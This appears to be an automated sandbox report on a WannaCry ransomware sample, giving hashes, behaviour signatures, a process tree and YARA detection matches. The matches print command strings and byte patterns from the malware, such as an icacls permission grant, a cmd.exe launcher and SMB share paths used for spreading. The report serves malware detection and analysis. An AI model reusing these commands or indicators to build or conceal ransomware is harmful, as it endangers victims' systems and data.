Edit tour

Windows Analysis Report
onq54JS79W.exe

Overview

General Information

Sample Name:	onq54JS79W.exe
Original Sample Name:	2023-04-27_a55d4ecd3ee9a6623c987bdae88293d7_wannacry.exe
Analysis ID:	856210
MD5:	a55d4ecd3ee9a6623c987bdae88293d7
SHA1:	e66e886608680c5792041112081e35ac003731b9
SHA256:	172f9cd29c170eca6db481e392af3dc395709e8086256f9699f216d6cf5b9191
Infos:

Detection

Wannacry

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for submitted file

Detected Wannacry Ransomware

Malicious sample detected (through community Yara rule)

Yara detected Wannacry ransomware

Antivirus detection for dropped file

Multi AV Scanner detection for dropped file

Connects to many different private IPs (likely to spread or exploit)

Machine Learning detection for dropped file

Drops executables to the windows directory (C:\Windows) and starts them

Machine Learning detection for sample

Connects to many different private IPs via SMB (likely to spread or exploit)

Creates a DirectInput object (often for capturing keystrokes)

Uses 32bit PE files

Yara signature match

Antivirus or Machine Learning detection for unpacked file

Drops PE files

May sleep (evasive loops) to hinder dynamic analysis

Drops PE files to the windows directory (C:\Windows)

Uses code obfuscation techniques (call, push, ret)

Creates files inside the system directory

Connects to several IPs in different countries

Detected potential crypto function

Dropped file seen in connection with other malware

Contains functionality to dynamically determine API calls

Uses Microsoft's Enhanced Cryptographic Provider

Contains functionality which may be used to detect a debugger (GetProcessHeap)

PE file contains executable resources (Code or Archives)

Classification

Process Tree

System is w10x64

onq54JS79W.exe (PID: 3644 cmdline: C:\Users\user\Desktop\onq54JS79W.exe MD5: A55D4ECD3EE9A6623C987BDAE88293D7)

tasksche.exe (PID: 4608 cmdline: C:\WINDOWS\tasksche.exe /i MD5: 7F7CCAA16FB15EB1C7399D422F8363E8)

onq54JS79W.exe (PID: 6948 cmdline: C:\Users\user\Desktop\onq54JS79W.exe -m security MD5: A55D4ECD3EE9A6623C987BDAE88293D7)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
WannaCryptor, WannaCry, WannaCrypt		Lazarus Group	http://blog.emsisoft.com/2017/05/12/wcry-ransomware-outbreak/ http://www.independent.co.uk/news/uk/home-news/wannacry-malware-hack-nhs-report-cybercrime-north-korea-uk-ben-wallace-a8022491.html https://baesystemsai.blogspot.de/2017/05/wanacrypt0r-ransomworm.html https://blog.avast.com/ransomware-that-infected-telefonica-and-nhs-hospitals-is-spreading-aggressively-with-over-50000-attacks-so-far-today https://blog.comae.io/wannacry-decrypting-files-with-wanakiwi-demo-86bafb81112d	https://malpedia.caad.fkie.fraunhofer.de/details/win.wannacryptor

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
onq54JS79W.exe	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (Nextron Systems) (with the help of binar.ly)	0x415a0:$x1: icacls . /grant Everyone:F /T /C /Q 0x3136c:$x3: tasksche.exe 0x4157c:$x3: tasksche.exe 0x41558:$x4: Global\MsWinZonesCacheCounterMutexA 0x415d0:$x5: WNcry@2ol7 0xe048:$x7: mssecsvc.exe 0x17350:$x7: mssecsvc.exe 0x31344:$x8: C:\%s\qeriuwjhrf 0x415a0:$x9: icacls . /grant Everyone:F /T /C /Q 0xe034:$s1: C:\%s\%s 0x17338:$s1: C:\%s\%s 0x31358:$s1: C:\%s\%s 0x414d0:$s3: cmd.exe /c "%s" 0x73a24:$s4: msg/m_portuguese.wnry 0x2e68c:$s5: \\192.168.56.20\IPC$ 0x1ba81:$s6: \\172.16.99.5\IPC$ 0x9131:$op1: 10 AC 72 0D 3D FF FF 1F AC 77 06 B8 01 00 00 00 0x3876:$op2: 44 24 64 8A C6 44 24 65 0E C6 44 24 66 80 C6 44 0x13e5:$op3: 18 DF 6C 24 14 DC 64 24 2C DC 6C 24 5C DC 15 88 0x34aa6:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C 0x34780:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56
onq54JS79W.exe	WannaCry_Ransomware_Gen	Detects WannaCry Ransomware	Florian Roth (Nextron Systems) (based on rule by US CERT)	0x1bacc:$s1: __TREEID__PLACEHOLDER__ 0x1bb68:$s1: __TREEID__PLACEHOLDER__ 0x1c3d4:$s1: __TREEID__PLACEHOLDER__ 0x1d439:$s1: __TREEID__PLACEHOLDER__ 0x1e4a0:$s1: __TREEID__PLACEHOLDER__ 0x1f508:$s1: __TREEID__PLACEHOLDER__ 0x20570:$s1: __TREEID__PLACEHOLDER__ 0x215d8:$s1: __TREEID__PLACEHOLDER__ 0x22640:$s1: __TREEID__PLACEHOLDER__ 0x236a8:$s1: __TREEID__PLACEHOLDER__ 0x24710:$s1: __TREEID__PLACEHOLDER__ 0x25778:$s1: __TREEID__PLACEHOLDER__ 0x267e0:$s1: __TREEID__PLACEHOLDER__ 0x27848:$s1: __TREEID__PLACEHOLDER__ 0x288b0:$s1: __TREEID__PLACEHOLDER__ 0x29918:$s1: __TREEID__PLACEHOLDER__ 0x2a980:$s1: __TREEID__PLACEHOLDER__ 0x2ab94:$s1: __TREEID__PLACEHOLDER__ 0x2abf4:$s1: __TREEID__PLACEHOLDER__ 0x2e2c4:$s1: __TREEID__PLACEHOLDER__ 0x2e340:$s1: __TREEID__PLACEHOLDER__
onq54JS79W.exe	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
onq54JS79W.exe	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0x4157c:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0x415a4:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
onq54JS79W.exe	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x340ba:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ... 0x8140:$main_3: 83 EC 50 56 57 B9 0E 00 00 00 BE D0 13 43 00 8D 7C 24 08 33 C0 F3 A5 A4 89 44 24 41 89 44 24 45 89 44 24 49 89 44 24 4D 89 44 24 51 66 89 44 24 55 50 50 50 6A 01 50 88 44 24 6B FF 15 34 A1 40 ... 0x8090:$start_service_3: 83 EC 10 68 04 01 00 00 68 60 F7 70 00 6A 00 FF 15 6C A0 40 00 FF 15 2C A1 40 00 83 38 02 7D 09 E8 6B FE FF FF 83 C4 10 C3 57 68 3F 00 0F 00 6A 00 6A 00 FF 15 10 A0 40 00 8B F8 85 FF 74 32 53 ... 0x9a16:$entrypoint_all: 55 8B EC 6A FF 68 A0 A1 40 00 68 A2 9B 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C0 A0 40 00 59 83 0D 94 F8 70 00 FF 83 0D 98 F8 70 ... 0x3985e:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...

Dropped Files

Source	Rule	Description	Author	Strings
C:\Windows\tasksche.exe	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (Nextron Systems) (with the help of binar.ly)	0xf4fc:$x1: icacls . /grant Everyone:F /T /C /Q 0xf4d8:$x3: tasksche.exe 0xf4b4:$x4: Global\MsWinZonesCacheCounterMutexA 0xf52c:$x5: WNcry@2ol7 0xf4fc:$x9: icacls . /grant Everyone:F /T /C /Q 0xf42c:$s3: cmd.exe /c "%s" 0x41980:$s4: msg/m_portuguese.wnry 0x2a02:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C 0x26dc:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56 0x22c8:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
C:\Windows\tasksche.exe	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
C:\Windows\tasksche.exe	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0xf4d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0xf500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
C:\Windows\tasksche.exe	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x2016:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ... 0x77ba:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...

Memory Dumps

Source	Rule	Description	Author	Strings
00000002.00000000.316611005.000000000040E000.00000008.00000001.01000000.00000005.sdmp	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0x14d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0x1500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
00000000.00000002.319173208.000000000040F000.00000008.00000001.01000000.00000003.sdmp	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
00000001.00000000.314578330.000000000040F000.00000008.00000001.01000000.00000003.sdmp	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
00000001.00000002.579769953.000000000042E000.00000004.00000001.01000000.00000003.sdmp	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
00000002.00000002.318070936.000000000040E000.00000008.00000001.01000000.00000005.sdmp	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0x14d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0x1500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
00000000.00000000.313347058.000000000040F000.00000008.00000001.01000000.00000003.sdmp	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
00000001.00000002.579812599.0000000000710000.00000080.00000001.01000000.00000003.sdmp	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
00000001.00000002.579812599.0000000000710000.00000080.00000001.01000000.00000003.sdmp	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0xf57c:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0xf5a4:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
00000001.00000000.314619123.0000000000710000.00000080.00000001.01000000.00000003.sdmp	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
00000001.00000000.314619123.0000000000710000.00000080.00000001.01000000.00000003.sdmp	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0xf57c:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0xf5a4:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
00000000.00000000.313403334.0000000000710000.00000080.00000001.01000000.00000003.sdmp	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
00000000.00000000.313403334.0000000000710000.00000080.00000001.01000000.00000003.sdmp	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0xf57c:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0xf5a4:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
00000000.00000002.319235199.0000000000710000.00000080.00000001.01000000.00000003.sdmp	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
00000000.00000002.319235199.0000000000710000.00000080.00000001.01000000.00000003.sdmp	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0xf57c:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0xf5a4:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
00000001.00000002.580942218.00000000023D6000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
00000001.00000002.580942218.00000000023D6000.00000004.00000020.00020000.00000000.sdmp	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0x32e44:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0x32e6c:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
00000001.00000002.580444356.0000000001EB4000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
00000001.00000002.580444356.0000000001EB4000.00000004.00000020.00020000.00000000.sdmp	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0x32600:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0x32628:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
Process Memory Space: onq54JS79W.exe PID: 3644	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
Process Memory Space: onq54JS79W.exe PID: 6948	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
Click to see the 15 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
1.2.onq54JS79W.exe.23d28e8.9.raw.unpack	SUSP_Imphash_Mar23_2	Detects imphash often found in malware samples (Zero hits with with search for \'imphash:x p:0\' on Virustotal)	Arnim Rupp (https://github.com/ruppde)
1.2.onq54JS79W.exe.1ea5084.5.raw.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (Nextron Systems) (with the help of binar.ly)	0x9131:$op1: 10 AC 72 0D 3D FF FF 1F AC 77 06 B8 01 00 00 00 0x3876:$op2: 44 24 64 8A C6 44 24 65 0E C6 44 24 66 80 C6 44 0x13e5:$op3: 18 DF 6C 24 14 DC 64 24 2C DC 6C 24 5C DC 15 88
1.2.onq54JS79W.exe.1ea5084.5.raw.unpack	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x8140:$main_3: 83 EC 50 56 57 B9 0E 00 00 00 BE D0 13 43 00 8D 7C 24 08 33 C0 F3 A5 A4 89 44 24 41 89 44 24 45 89 44 24 49 89 44 24 4D 89 44 24 51 66 89 44 24 55 50 50 50 6A 01 50 88 44 24 6B FF 15 34 A1 40 ... 0x8090:$start_service_3: 83 EC 10 68 04 01 00 00 68 60 F7 70 00 6A 00 FF 15 6C A0 40 00 FF 15 2C A1 40 00 83 38 02 7D 09 E8 6B FE FF FF 83 C4 10 C3 57 68 3F 00 0F 00 6A 00 6A 00 FF 15 10 A0 40 00 8B F8 85 FF 74 32 53 ... 0x9a16:$entrypoint_all: 55 8B EC 6A FF 68 A0 A1 40 00 68 A2 9B 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C0 A0 40 00 59 83 0D 94 F8 70 00 FF 83 0D 98 F8 70 ...
1.2.onq54JS79W.exe.23c78c8.7.raw.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (Nextron Systems) (with the help of binar.ly)	0x9131:$op1: 10 AC 72 0D 3D FF FF 1F AC 77 06 B8 01 00 00 00 0x3876:$op2: 44 24 64 8A C6 44 24 65 0E C6 44 24 66 80 C6 44 0x13e5:$op3: 18 DF 6C 24 14 DC 64 24 2C DC 6C 24 5C DC 15 88
1.2.onq54JS79W.exe.23c78c8.7.raw.unpack	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x8140:$main_3: 83 EC 50 56 57 B9 0E 00 00 00 BE D0 13 43 00 8D 7C 24 08 33 C0 F3 A5 A4 89 44 24 41 89 44 24 45 89 44 24 49 89 44 24 4D 89 44 24 51 66 89 44 24 55 50 50 50 6A 01 50 88 44 24 6B FF 15 34 A1 40 ... 0x8090:$start_service_3: 83 EC 10 68 04 01 00 00 68 60 F7 70 00 6A 00 FF 15 6C A0 40 00 FF 15 2C A1 40 00 83 38 02 7D 09 E8 6B FE FF FF 83 C4 10 C3 57 68 3F 00 0F 00 6A 00 6A 00 FF 15 10 A0 40 00 8B F8 85 FF 74 32 53 ... 0x9a16:$entrypoint_all: 55 8B EC 6A FF 68 A0 A1 40 00 68 A2 9B 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C0 A0 40 00 59 83 0D 94 F8 70 00 FF 83 0D 98 F8 70 ...
1.2.onq54JS79W.exe.1eb00a4.4.raw.unpack	SUSP_Imphash_Mar23_2	Detects imphash often found in malware samples (Zero hits with with search for \'imphash:x p:0\' on Virustotal)	Arnim Rupp (https://github.com/ruppde)
2.0.tasksche.exe.400000.0.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (Nextron Systems) (with the help of binar.ly)	0xf4fc:$x1: icacls . /grant Everyone:F /T /C /Q 0xf4d8:$x3: tasksche.exe 0xf4b4:$x4: Global\MsWinZonesCacheCounterMutexA 0xf52c:$x5: WNcry@2ol7 0xf4fc:$x9: icacls . /grant Everyone:F /T /C /Q 0xf42c:$s3: cmd.exe /c "%s" 0x41980:$s4: msg/m_portuguese.wnry 0x2a02:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C 0x26dc:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56 0x22c8:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
2.0.tasksche.exe.400000.0.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
2.0.tasksche.exe.400000.0.unpack	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0xf4d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0xf500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
2.0.tasksche.exe.400000.0.unpack	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x2016:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ... 0x77ba:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...
1.2.onq54JS79W.exe.1ed7128.2.raw.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (Nextron Systems) (with the help of binar.ly)	0xf4fc:$x1: icacls . /grant Everyone:F /T /C /Q 0xf4d8:$x3: tasksche.exe 0xf4b4:$x4: Global\MsWinZonesCacheCounterMutexA 0xf52c:$x5: WNcry@2ol7 0xf4fc:$x9: icacls . /grant Everyone:F /T /C /Q 0xf42c:$s3: cmd.exe /c "%s" 0x41980:$s4: msg/m_portuguese.wnry 0x2a02:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C 0x26dc:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56 0x22c8:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
1.2.onq54JS79W.exe.1ed7128.2.raw.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
1.2.onq54JS79W.exe.1ed7128.2.raw.unpack	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0xf4d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0xf500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
1.2.onq54JS79W.exe.1ed7128.2.raw.unpack	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x2016:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ... 0x77ba:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...
1.2.onq54JS79W.exe.1eb4104.3.raw.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (Nextron Systems) (with the help of binar.ly)	0x32520:$x1: icacls . /grant Everyone:F /T /C /Q 0x222ec:$x3: tasksche.exe 0x324fc:$x3: tasksche.exe 0x324d8:$x4: Global\MsWinZonesCacheCounterMutexA 0x32550:$x5: WNcry@2ol7 0x82d0:$x7: mssecsvc.exe 0x222c4:$x8: C:\%s\qeriuwjhrf 0x32520:$x9: icacls . /grant Everyone:F /T /C /Q 0x82b8:$s1: C:\%s\%s 0x222d8:$s1: C:\%s\%s 0x32450:$s3: cmd.exe /c "%s" 0x649a4:$s4: msg/m_portuguese.wnry 0x1f60c:$s5: \\192.168.56.20\IPC$ 0xca01:$s6: \\172.16.99.5\IPC$ 0x25a26:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C 0x25700:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56 0x252ec:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
1.2.onq54JS79W.exe.1eb4104.3.raw.unpack	WannaCry_Ransomware_Gen	Detects WannaCry Ransomware	Florian Roth (Nextron Systems) (based on rule by US CERT)	0xca4c:$s1: __TREEID__PLACEHOLDER__ 0xcae8:$s1: __TREEID__PLACEHOLDER__ 0xd354:$s1: __TREEID__PLACEHOLDER__ 0xe3b9:$s1: __TREEID__PLACEHOLDER__ 0xf420:$s1: __TREEID__PLACEHOLDER__ 0x10488:$s1: __TREEID__PLACEHOLDER__ 0x114f0:$s1: __TREEID__PLACEHOLDER__ 0x12558:$s1: __TREEID__PLACEHOLDER__ 0x135c0:$s1: __TREEID__PLACEHOLDER__ 0x14628:$s1: __TREEID__PLACEHOLDER__ 0x15690:$s1: __TREEID__PLACEHOLDER__ 0x166f8:$s1: __TREEID__PLACEHOLDER__ 0x17760:$s1: __TREEID__PLACEHOLDER__ 0x187c8:$s1: __TREEID__PLACEHOLDER__ 0x19830:$s1: __TREEID__PLACEHOLDER__ 0x1a898:$s1: __TREEID__PLACEHOLDER__ 0x1b900:$s1: __TREEID__PLACEHOLDER__ 0x1bb14:$s1: __TREEID__PLACEHOLDER__ 0x1bb74:$s1: __TREEID__PLACEHOLDER__ 0x1f244:$s1: __TREEID__PLACEHOLDER__ 0x1f2c0:$s1: __TREEID__PLACEHOLDER__
1.2.onq54JS79W.exe.1eb4104.3.raw.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
1.2.onq54JS79W.exe.1eb4104.3.raw.unpack	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0x324fc:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0x32524:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
0.2.onq54JS79W.exe.400000.0.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (Nextron Systems) (with the help of binar.ly)	0x415a0:$x1: icacls . /grant Everyone:F /T /C /Q 0x3136c:$x3: tasksche.exe 0x4157c:$x3: tasksche.exe 0x41558:$x4: Global\MsWinZonesCacheCounterMutexA 0x415d0:$x5: WNcry@2ol7 0x17350:$x7: mssecsvc.exe 0x31344:$x8: C:\%s\qeriuwjhrf 0x415a0:$x9: icacls . /grant Everyone:F /T /C /Q 0x17338:$s1: C:\%s\%s 0x31358:$s1: C:\%s\%s 0x414d0:$s3: cmd.exe /c "%s" 0x73a24:$s4: msg/m_portuguese.wnry 0x2e68c:$s5: \\192.168.56.20\IPC$ 0x1ba81:$s6: \\172.16.99.5\IPC$ 0x9131:$op1: 10 AC 72 0D 3D FF FF 1F AC 77 06 B8 01 00 00 00 0x3876:$op2: 44 24 64 8A C6 44 24 65 0E C6 44 24 66 80 C6 44 0x13e5:$op3: 18 DF 6C 24 14 DC 64 24 2C DC 6C 24 5C DC 15 88 0x34aa6:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C 0x34780:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56 0x3436c:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
0.2.onq54JS79W.exe.400000.0.unpack	WannaCry_Ransomware_Gen	Detects WannaCry Ransomware	Florian Roth (Nextron Systems) (based on rule by US CERT)	0x1bacc:$s1: __TREEID__PLACEHOLDER__ 0x1bb68:$s1: __TREEID__PLACEHOLDER__ 0x1c3d4:$s1: __TREEID__PLACEHOLDER__ 0x1d439:$s1: __TREEID__PLACEHOLDER__ 0x1e4a0:$s1: __TREEID__PLACEHOLDER__ 0x1f508:$s1: __TREEID__PLACEHOLDER__ 0x20570:$s1: __TREEID__PLACEHOLDER__ 0x215d8:$s1: __TREEID__PLACEHOLDER__ 0x22640:$s1: __TREEID__PLACEHOLDER__ 0x236a8:$s1: __TREEID__PLACEHOLDER__ 0x24710:$s1: __TREEID__PLACEHOLDER__ 0x25778:$s1: __TREEID__PLACEHOLDER__ 0x267e0:$s1: __TREEID__PLACEHOLDER__ 0x27848:$s1: __TREEID__PLACEHOLDER__ 0x288b0:$s1: __TREEID__PLACEHOLDER__ 0x29918:$s1: __TREEID__PLACEHOLDER__ 0x2a980:$s1: __TREEID__PLACEHOLDER__ 0x2ab94:$s1: __TREEID__PLACEHOLDER__ 0x2abf4:$s1: __TREEID__PLACEHOLDER__ 